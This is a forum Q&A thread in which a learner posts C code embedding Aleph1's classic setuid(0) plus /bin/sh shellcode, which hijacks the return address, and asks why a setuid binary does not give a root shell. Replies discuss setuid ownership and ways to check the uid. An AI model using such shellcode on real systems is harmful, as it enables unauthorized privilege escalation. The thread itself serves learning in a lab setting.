tags:

views:

339

answers:

5

hello folks, I am following this EBook about Ethical Hacking, and I reached the Linux Exploit Chapter, this is the code with Aleph's 1 code.

//shellcode.c

char shellcode[] = //setuid(0) & Aleph1's famous shellcode, see ref.

"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main() { //main function

    int *ret; //ret pointer for manipulating saved return.

    ret = (int *)&ret + 2; //setret to point to the saved return

    //value on the stack.

    (*ret) = (int)shellcode; //change the saved return value to the

    //address of the shellcode, so it executes.

}

I give this the super user privileges, with

chmod u+s shellcode

as a super user, then go back to normal user with

su - normal_user

but when I run ./shellcode I should be a root user but instead I still be normal_user so any help?? btw I am working on BT4-Final, I turned off the ASLR, and running BT4 in VMWare...

+6  A: 

Is the shellcode executable owned by root? The setuid bit (u+s) makes the executable run with the privileges of its owner, which is not necessarily root.

Tyler McHenry
I think the whole point is that the shell code is run by a non-privileged user and *gains* root.
John Weldon
Yes, that is true. The point of this demonstration is that a flaw in an executable that is setuid root can be exploited by a normal user to gain root. The executable still has to be *owned* by root for this to work, though. If it were possible to get root this way without the executable being owned by root, then every system in the world could be instantly taken over by anyone with access to a compiler.
Tyler McHenry
Makes sense. I retract my comment (but I'll leave it up for the record) :)
John Weldon
It *is* the point of shell code, but not of setuid bit.
el.pescado
ok can I change the shellcode into another one just to see that it really happens, ex. can I point to another address of another program to check whether it was executed or not!
kmitnick
@TeryMcHenry: yes it is owned by the root user
kmitnick
A: 

Well, setuid() changes the user for the currently running program. Your Shell will still be running under your normal user! :)

Either that, or I don't get this hack's purpose.

LukeN
A: 

I think setuid only sets the uid to 0 while the program is running. Can you perform some operation to check the UID while the shellcode is running?

John Weldon
Shellcode as the name suggests is designed to drop you into a privileged shell, so you can check your uid from the command line, if it worked.
Steven Jackson
I tried the whoamiand still normal_user
kmitnick
+7  A: 

If this is an old exploit... Shouldn't it have been already fixed long ago?

By the way, as a personal advice: don't be so lame to use that nickname and then go around asking about exploits facepalm

fortran
What? Are you saying that Karl M. Itnick can't ask questions here?
curtisk
@curtisk I thought that he was called Konrad, studied at MIT and that was his *nick*... xD
fortran
+1 for facepalm
Longpoke
@fortran : just answer the question without any extra comment, so if you don't know the answer, keep your keyboard like new and don't bother to type anything...
kmitnick
@kmitnick I comment whatever I like, if you're not happy with that, you're free to downvote.
fortran
A: 

If I get it right, the code you are executing (setuid(0)) is a System Call that changes the current user to the root. The catch is that it's changing the current user id over that process, giving that process root authority. If it is working you could run anything with root privileges.

To test it, create a file or directory with the root, make sure you can't remove it as a simple user, and then try adding code to your executable that removes the file. If the code is working, the file should be deleted.

Then, to gain root powers, try to fork to a new shell from within your program. I'm not sure if it's possible, though.

...however, this is an old exploit. Old kernels might be open to this, but using any recent release will do nothing at all.

UPDATE: I've just re-read the code and realized the call to the shell is there (/bin/sh), so you are already forking to a supposed super-user shell. To check if it's actually working, see the PID of your shell before and after the call. If it has changed, exit the shell, you should return to the previous PID. That means (1) it worked, you manipulated the stack and executed that code there, and (2) the exploit is fixed and the Kernel is preventing you from gaining access.

Bruno Brant
The code drops you into a root shell there is no need to add any of your own code.
Steven Jackson
@Steven: beat me to it. I missed the code there at first, but was adding the text about it ...
Bruno Brant